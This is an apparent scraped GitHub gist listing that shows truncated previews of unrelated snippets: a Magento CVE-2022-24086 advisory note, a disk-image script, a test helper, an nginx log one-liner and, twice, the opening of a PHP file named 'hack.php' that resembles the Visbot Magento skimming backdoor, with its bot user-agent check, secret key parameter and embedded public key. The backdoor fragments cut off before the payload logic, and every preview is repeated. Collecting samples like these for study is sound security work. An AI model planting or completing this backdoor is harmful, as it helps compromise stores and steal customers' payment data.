Luke Rodgers convenient

## MDVA-43395-quick-instructions.md

      
              1 file
            
          
              0 forks
            
          
              20 comments
            
          
              7 stars
            
          
                wigman
                / MDVA-43395-quick-instructions.md
            
            
              Last active
              March 10, 2023 09:07
            
              
                Instructions for quick and dirty Magento 2 Store patch for exploit MDVA-43395
              
          
    Security updates available for Magento - APSB22-12

Adobe has released security updates for Adobe Commerce and Magento Open Source. These updates resolve a vulnerability rated critical. Successful exploitation could lead to arbitrary code execution.
Adobe is aware that CVE-2022-24086 has been exploited in the wild in very limited attacks targeting Adobe Commerce merchants.

This vulnerability has a similar severity as the Magento Shoplift vulnerability from 2015. At that time, nearly all unpatched Magento stores globally were compromised in the days after the exploit publication.

– Sansec (https://sansec.io/research/magento-2-cve-2022-24086)

  
## casesafe.sh
#!/bin/bash

# ---------------------------------------------------------
# Customizable Settings
# ---------------------------------------------------------

MOUNT_POINT="${CASE_SAFE_MOUNT_POINT:-${HOME}/casesafe}"
VOLUME_PATH="${CASE_SAFE_VOLUME_PATH:-${HOME}/.casesafe.dmg.sparseimage}"
VOLUME_NAME="${CASE_SAFE_VOLUME_NAME:-casesafe}"
VOLUME_SIZE="${CASE_SAFE_VOLUME_SIZE:-60g}"

## AcceptanceHelper.php
<?php

namespace tests\codeception\common\_support;

use Codeception\Exception\ModuleException;

/**
 *
 */
class AcceptanceHelper extends \Codeception\Module

## maghack.php
<?PHP
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
$m1 = '1355773528';
$k2 = 'pccbe60c';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
    if (isset($_GET[$k2])) {
        $m1 = file_exists($y0)
            ? @filemtime($y0)
            : $m1;

## hack.php
<?PHP
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
$m1 = '1355773528';
$k2 = 'pccbe60c';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
    if (isset($_GET[$k2])) {
        $m1 = file_exists($y0)
            ? @filemtime($y0)
            : $m1;

## gist:2774350
# One liner for counting unique IP addresses from nginx logs
# Feel free to comment with better ideas - I'm sure it's not the best way of doing this (I'm no awk ninja!)
#
# Sample output:
#
# $ cat example.com.access.log | awk -F " " '{a[$1]++ } END { for (b in a) { print b, "\t", a[b] } }'
# 66.65.145.220 49
# 92.63.28.68 126

cat example.com.access.log | awk -F " " '{a[$1]++ } END  { for (b in a) { print b, "\t", a[b] } }'
	#!/bin/bash

	# ---------------------------------------------------------
	# Customizable Settings
	# ---------------------------------------------------------

	MOUNT_POINT="${CASE_SAFE_MOUNT_POINT:-${HOME}/casesafe}"
	VOLUME_PATH="${CASE_SAFE_VOLUME_PATH:-${HOME}/.casesafe.dmg.sparseimage}"
	VOLUME_NAME="${CASE_SAFE_VOLUME_NAME:-casesafe}"
	VOLUME_SIZE="${CASE_SAFE_VOLUME_SIZE:-60g}"
	<?php

	namespace tests\codeception\common\_support;

	use Codeception\Exception\ModuleException;

	/**
	*
	*/
	class AcceptanceHelper extends \Codeception\Module
	<?PHP
	$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
	$m1 = '1355773528';
	$k2 = 'pccbe60c';
	$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
	if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
	if (isset($_GET[$k2])) {
	$m1 = file_exists($y0)
	? @filemtime($y0)
	: $m1;
	# One liner for counting unique IP addresses from nginx logs
	# Feel free to comment with better ideas - I'm sure it's not the best way of doing this (I'm no awk ninja!)
	#
	# Sample output:
	#
	# $ cat example.com.access.log \| awk -F " " '{a[$1]++ } END { for (b in a) { print b, "\t", a[b] } }'
	# 66.65.145.220 49
	# 92.63.28.68 126

	cat example.com.access.log \| awk -F " " '{a[$1]++ } END { for (b in a) { print b, "\t", a[b] } }'